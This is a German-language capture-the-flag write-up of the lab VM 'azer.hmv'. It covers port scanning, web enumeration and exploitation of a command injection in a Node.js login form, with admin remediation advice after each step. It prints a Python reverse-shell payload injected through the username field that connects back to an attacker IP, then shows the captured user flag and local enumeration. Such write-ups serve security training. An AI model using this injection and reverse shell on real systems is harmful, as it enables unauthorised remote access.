Analyse: Der erste Schritt ist ein ARP-Scan im lokalen Netzwerk (`-l`), um aktive Hosts zu identifizieren.
Bewertung: Der Scan findet erfolgreich das Zielsystem unter der IP `192.168.2.114`. Die MAC-Adresse `08:00:27:46:00:f3` gehört zu "PCS Systemtechnik GmbH", was auf eine Oracle VirtualBox VM hinweist. Ein Standard-Startpunkt.
Empfehlung (Pentester): Verwende die IP `192.168.2.114` für weitere Scans. Notiere die VM-Information als Kontext.
Empfehlung (Admin): Netzwerksegmentierung kann die Sichtbarkeit durch ARP-Scans reduzieren. Überwachen Sie auf ungewöhnliche ARP-Aktivitäten.
192.168.2.114 08:00:27:46:00:f3 PCS Systemtechnik GmbH
Analyse: Die lokale `/etc/hosts`-Datei wird bearbeitet (`vi`), um der IP-Adresse `192.168.2.114` den Hostnamen `azer.hmv` zuzuordnen.
Bewertung: Dies ist eine essenzielle Vorbereitung, um Webserver, die möglicherweise mit Virtual Hosts konfiguriert sind, korrekt ansprechen zu können.
Empfehlung (Pentester): Verwende `azer.hmv` in allen nachfolgenden Web-Interaktionen.
Empfehlung (Admin): Sorgen Sie für eine sichere und zuverlässige Namensauflösung im Netzwerk.
# Inhalt der /etc/hosts nach Bearbeitung:
127.0.0.1 localhost
192.168.2.114 azer.hmv
Analyse: Ein Nmap TCP SYN Scan (`-sS`) mit Versionserkennung (`-sV`), OS-Erkennung (`-O`) und schnellem Timing (`-T5`) wird über alle Ports (`-p-`) ausgeführt. Die Ausgabe wird gefiltert (`grep open`), um nur offene Ports anzuzeigen. Die Option `-A` wird nicht verwendet, aber `-O` ist Teil davon.
Bewertung: Der Scan identifiziert zwei offene TCP-Ports, die die Hauptangriffsfläche bilden: * `80/tcp`: Apache httpd 2.4.57 (Debian). Ein Standard-Webserver. * `3000/tcp`: Node.js (Express middleware). Ein weiterer Webserver, oft für APIs oder spezifische Webanwendungen verwendet.
Empfehlung (Pentester): Untersuche beide Webdienste. Beginne mit Port 80 (Apache) für grundlegende Enumeration, aber konzentriere dich dann auf Port 3000 (Node.js), da dies oft auf eine benutzerdefinierte Anwendung hindeutet.
Empfehlung (Admin): Stellen Sie sicher, dass sowohl der Apache- als auch der Node.js-Dienst aktuell gepatcht und sicher konfiguriert sind. Firewall: Nur benötigte Ports öffnen.
80/tcp open http Apache httpd 2.4.57 ((Debian))
3000/tcp open http Node.js (Express middleware)
Analyse: Der Nmap-Scan wird mit denselben Optionen wiederholt, diesmal jedoch mit vollständiger Ausgabe.
Bewertung: Die vollständige Ausgabe bestätigt die Dienste und liefert zusätzliche Details: * **Port 80 (Apache):** Seitentitel "LÖSEV | Lösemili Çocuklar Vakfı" (eine türkische Stiftung für Kinder mit Leukämie). Dies wirkt deplatziert und könnte ein Hinweis auf eine Defacement, eine Fehlkonfiguration oder eine absichtliche Irreführung sein. * **Port 3000 (Node.js):** Seitentitel "Login Page". Dies ist eindeutig ein Login-Portal und damit ein primäres Ziel. * **OS:** Wird als Debian Linux erkannt.
Empfehlung (Pentester): Fokussiere dich stark auf die Login-Seite auf Port 3000. Untersuche die LÖSEV-Seite auf Port 80 kurz auf versteckte Hinweise oder Verzeichnisse, aber erwarte hier keine Kernfunktionalität.
Empfehlung (Admin): Klären Sie den Zweck der Webseite auf Port 80. Wenn sie nicht beabsichtigt ist, entfernen Sie sie. Sichern Sie die Node.js-Anwendung auf Port 3000 (Authentifizierung, Input-Validierung etc.).
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-30 23:08 CEST
Nmap scan report for azer.hmv (192.168.2.114)
Host is up (0.00018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Debian))
|_http-title: LÖSEV | Lösemili Çocuklar Vakf\xC4\xB1
|_http-server-header: Apache/2.4.57 (Debian)
3000/tcp open http Node.js (Express middleware)
|_http-title: Login Page
MAC Address: 08:00:27:46:00:F3 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 4.15 - 5.8 (95%), Linux 5.0 - 5.5 (94%), Linux 5.0 - 5.4 (92%), Linux 2.6.32 (91%), Linux 3.2 - 4.9 (91%), Linux 2.6.32 - 3.10 (91%), Linux 5.3 - 5.4 (90%), Linux 5.4 (90%), Linux 3.4 - 3.10 (89%), Linux 3.3 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.18 ms azer.hmv (192.168.2.114)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
Analyse: `nikto` wird auf den Apache-Server (Port 80) ausgeführt, um nach bekannten Schwachstellen und Konfigurationsfehlern zu suchen.
Bewertung: Nikto bestätigt Apache 2.4.57 (Debian) und meldet die üblichen Findings: * Fehlende Sicherheitsheader (`X-Frame-Options`, `X-Content-Type-Options`). * Mögliches Informationsleck durch ETag-Format. * Erlaubte HTTP-Methoden (POST, OPTIONS, HEAD, GET). Keine kritischen Schwachstellen auf Port 80 identifiziert.
Empfehlung (Pentester): Dokumentiere die Findings für Port 80, aber konzentriere die Bemühungen auf Port 3000.
Empfehlung (Admin): Implementieren Sie die fehlenden Sicherheitsheader. Aktualisieren Sie Apache. Konfigurieren Sie ETags sicher.
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.2.114
+ Target Hostname: 192.168.2.114
+ Target Port: 80
+ Start Time: 2024-04-30 23:08:50 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.57 (Debian)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 9e9b, size: 611db26291300, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, HEAD, GET .
+ 8103 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-04-30 23:09:06 (GMT2) (16 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Analyse: `gobuster` wird für einen Verzeichnis- und Dateiscan auf Port 80 verwendet, mit einer Medium-Wortliste und vielen Endungen.
Bewertung: Der Scan findet `/index.html` (die LÖSEV-Seite) und zwei Verzeichnisse: `/v6/` und `/ik/`. Diese gehören wahrscheinlich zur LÖSEV-Webseite.
Empfehlung (Pentester): Untersuche kurz `/v6/` und `/ik/` auf Hinweise, aber erwarte hier keine Schwachstellen für den Haupteinstieg.
Empfehlung (Admin): Entfernen Sie unnötige Verzeichnisse und Dateien vom Webserver.
==============================================================================================================================
http://azer.hmv/index.html (Status: 200) [Size: 40603]
http://azer.hmv/v6 (Status: 301) [Size: 301] [--> http://azer.hmv/v6/]
http://azer.hmv/ik (Status: 301) [Size: 301] [--> http://azer.hmv/ik/]
==============================================================================================================================
Analyse: Der Quellcode von `/v6/bagis.html` (vermutlich innerhalb des `/v6`-Verzeichnisses gefunden) wird inspiziert.
Bewertung: Der Code enthält Kommentare von `HTTrack Website Copier`. Dies bestätigt, dass der Inhalt auf Port 80 wahrscheinlich nur eine statische Kopie einer anderen Webseite ist und nicht die eigentliche Anwendung darstellt.
Empfehlung (Pentester): Ignoriere Port 80 weitgehend und konzentriere dich voll auf Port 3000.
Empfehlung (Admin): Entfernen Sie gecrawlte Webseiten vom Server, wenn sie nicht benötigt werden.
view-source:http://azer.hmv/v6/bagis.html
Analyse: Der Quellcode der Login-Seite auf Port 3000 (`http://azer.hmv:3000`) wird angezeigt.
Bewertung: Es handelt sich um ein Standard-HTML-Login-Formular, das die eingegebenen Daten per POST an `/login` sendet. Die Felder heißen `username` und `password`. Keine clientseitige Validierung sichtbar.
Empfehlung (Pentester): Teste dieses Formular auf Command Injection (wie bereits erfolgreich durchgeführt), SQL-Injection, Default Credentials und andere Web-Schwachstellen.
Empfehlung (Admin): Sichern Sie das Backend (`/login`), das diese Formulardaten verarbeitet, gegen alle gängigen Web-Angriffe.
# Quellcode von http://azer.hmv:3000Login Page Login
Analyse: Eine Fehlermeldung, die vermutlich bei einem fehlgeschlagenen Login-Versuch auf Port 3000 aufgetreten ist, wird analysiert. Sie lautet: "Error executing bash script: Command failed: /home/azer/get.sh admin admin fatal: not a git repository...". Es wird versucht, auf `/.git` zuzugreifen, was fehlschlägt.
Bewertung: Diese Fehlermeldung ist **extrem aufschlussreich**. Sie verrät: 1. Ein Skript `/home/azer/get.sh` wird im Backend ausgeführt. 2. Die Eingaben aus dem Login-Formular (hier "admin" und "admin") werden als Argumente an dieses Skript übergeben. 3. Das Skript führt `git`-Befehle aus. 4. Der Benutzer `azer` existiert. Dies schreit förmlich nach einer **Command Injection**-Schwachstelle, da Benutzereingaben offenbar direkt oder unsicher an ein Shell-Skript weitergegeben werden. Der fehlgeschlagene Zugriff auf `/.git` ist hier weniger relevant.
Empfehlung (Pentester): Nutze die Command Injection! Injiziere Shell-Metacharacters (`;`, `|`, `$()`, `` ` ``) und Befehle in das `username`- oder `password`-Feld des Login-Formulars auf Port 3000, um eigene Befehle auszuführen. Ziel ist eine Reverse Shell.
Empfehlung (Admin): **Beheben Sie diese kritische Command Injection sofort!** Übergeben Sie niemals Benutzereingaben direkt an Shell-Befehle. Verwenden Sie stattdessen sichere APIs oder validieren und sanitisieren Sie die Eingaben rigoros, um Metacharacter zu neutralisieren. Überprüfen Sie den Code von `server.js` (Node.js) und `/home/azer/get.sh`. Geben Sie keine detaillierten Fehlermeldungen an den Benutzer aus.
# Beobachtete Fehlermeldung (vermutlich von Port 3000)
Error executing bash script: Command failed: /home/azer/get.sh admin admin fatal: not a git repository (or any of the parent directories): .git
# Versuchter Zugriff auf /.git (basierend auf Fehler)
http://azer.hmv:3000/.git
--> Cannot GET /.git
Analyse: Die Command Injection-Schwachstelle wird ausgenutzt. Ein Python-Reverse-Shell-Payload wird in das `Username`-Feld des Login-Formulars auf Port 3000 eingefügt. Das Semikolon `;` am Anfang dient dazu, den ursprünglichen Befehl im Backend-Skript abzuschließen, bevor der Python-Payload ausgeführt wird. Auf dem Angreifer-System wird ein Netcat-Listener auf Port 5555 gestartet.
Bewertung: **Initial Access erfolgreich!** Der Exploit funktioniert. Der Listener auf Port 5555 empfängt eine Verbindung vom Zielsystem, und eine interaktive Shell als Benutzer `azer` wird erlangt. Der `id`-Befehl bestätigt die Benutzeridentität (uid=1000).
Empfehlung (Pentester): Stabilisiere die Shell (z.B. mit Python PTY). Beginne mit der Enumeration des Systems als Benutzer `azer`. Lese die User-Flag (`user.txt`). Suche nach Wegen zur Privilege Escalation.
Empfehlung (Admin): **Command Injection sofort beheben!** (Siehe vorherige Empfehlung). Untersuchen Sie die Logs auf Anzeichen des Angriffs. Überprüfen Sie das System auf Kompromittierung.
# Payload für das Username-Feld auf http://azer.hmv:3000/
Username: ;python3 -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.199",5555));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
Password: [beliebig]
listening on [any] 5555 ... connect to [192.168.2.199] from (UNKNOWN) [192.168.2.114] 60286 /bin/sh: 0: can't access tty; job control turned off $ id uid=1000(azer) gid=1000(azer) groups=1000(azer),100(users) $ ls get.sh node_modules package.json package-lock.json server.js user.txt $ cat user.txt 0d2856d69dc348b3af80a0eed67c7502 $
Analyse: Dieser POC fasst die Schritte zur Erlangung einer Shell als Benutzer `azer` durch Ausnutzung einer Command Injection-Schwachstelle im Login-Formular der Node.js-Anwendung auf Port 3000 zusammen.
Schwachstelle: Die Benutzereingabe aus dem Login-Formular (wahrscheinlich das Username-Feld) wird unsicher an ein Shell-Skript (`/home/azer/get.sh`) übergeben, was die Injektion von beliebigen Shell-Befehlen mittels Metacharacters (hier `;`) ermöglicht.
Voraussetzungen: Zugriff auf das Login-Formular unter `http://azer.hmv:3000`. Ein Listener auf dem Angreifer-System.
Schritte zur Reproduktion:
Erwartetes Ergebnis: Eine Reverse Shell verbindet sich vom Zielsystem zum Netcat-Listener des Angreifers und gewährt eine Shell als Benutzer `azer`.
Empfehlung (Admin): **Command Injection-Schwachstelle beheben!** Überprüfen Sie den Code von `server.js` und `get.sh`. Verwenden Sie niemals direkte Benutzereingaben in Shell-Befehlen. Nutzen Sie stattdessen sichere Methoden zur Interaktion mit anderen Prozessen oder sanitisieren/validieren Sie Eingaben rigoros.
Analyse: Als Benutzer `azer` wird eine grundlegende Systemenumeration durchgeführt: SUID-Dateien (`find`), Netzwerk-Listener (`ss`), `/etc/passwd`-Berechtigungen, `sudo`-Check, Capabilities (`getcap`), Crontab (`cat /etc/crontab`) und Netzwerkschnittstellen (`ip a`).
Bewertung: * **SUID/Capabilities/sudo/Crontab:** Keine offensichtlichen oder leicht ausnutzbaren Vektoren für Privilege Escalation gefunden. `sudo` ist nicht installiert/verfügbar. * **Netzwerk:** Bestätigt Listener auf 80 und 3000. **Wichtigster Fund:** Die Existenz von Docker-Netzwerkschnittstellen (`br-333...`, `docker0`, `veth...`) mit dem internen Netzwerk `10.10.10.0/24`.
Empfehlung (Pentester): Das Docker-Netzwerk `10.10.10.0/24` ist der vielversprechendste nächste Schritt. Versuche, Dienste innerhalb dieses Netzwerks vom `azer`-Host aus zu scannen oder direkt zu kontaktieren (z.B. `curl`, `nc`). Suche nach der IP des Containers (oft nicht die Gateway-IP `.1`).
Empfehlung (Admin): Überprüfen Sie die Docker-Konfiguration. Sichern Sie die Kommunikation zwischen Host und Containern sowie zwischen Containern. Führen Sie Container mit minimalen Rechten aus. Überwachen Sie Docker-Netzwerke.
277097 52 -rwsr-xr-- 1 root messagebus 51272 Sep 16 2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
285836 640 -rwsr-xr-x 1 root root 653888 Dec 19 09:51 /usr/lib/openssh/ssh-keysign
406202 20 -rwsr-xr-x 1 root root 18664 Jan 31 2023 /usr/lib/polkit-1/polkit-agent-helper-1
264246 36 -rwsr-xr-x 1 root root 35128 Mar 23 2023 /usr/bin/umount
290341 36 -rwsr-xr-x 1 root root 35128 Apr 18 2023 /usr/bin/fusermount3
260733 64 -rwsr-xr-x 1 root root 62672 Mar 23 2023 /usr/bin/chfn
264244 60 -rwsr-xr-x 1 root root 59704 Mar 23 2023 /usr/bin/mount
264762 72 -rwsr-xr-x 1 root root 72000 Mar 23 2023 /usr/bin/su
260736 88 -rwsr-xr-x 1 root root 88496 Mar 23 2023 /usr/bin/gpasswd
260737 68 -rwsr-xr-x 1 root root 68248 Mar 23 2023 /usr/bin/passwd
264091 48 -rwsr-xr-x 1 root root 48896 Mar 23 2023 /usr/bin/newgrp
260734 52 -rwsr-xr-x 1 root root 52880 Mar 23 2023 /usr/bin/chsh
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 511 *:3000 *:* users:(("node",pid=493,fd=18))
LISTEN 0 511 *:80 *:*
-rw-r--r-- 1 root root 1185 Feb 21 07:24 /etc/passwd
bash: sudo: command not found
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/bin/ping cap_net_raw=ep
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly; }
#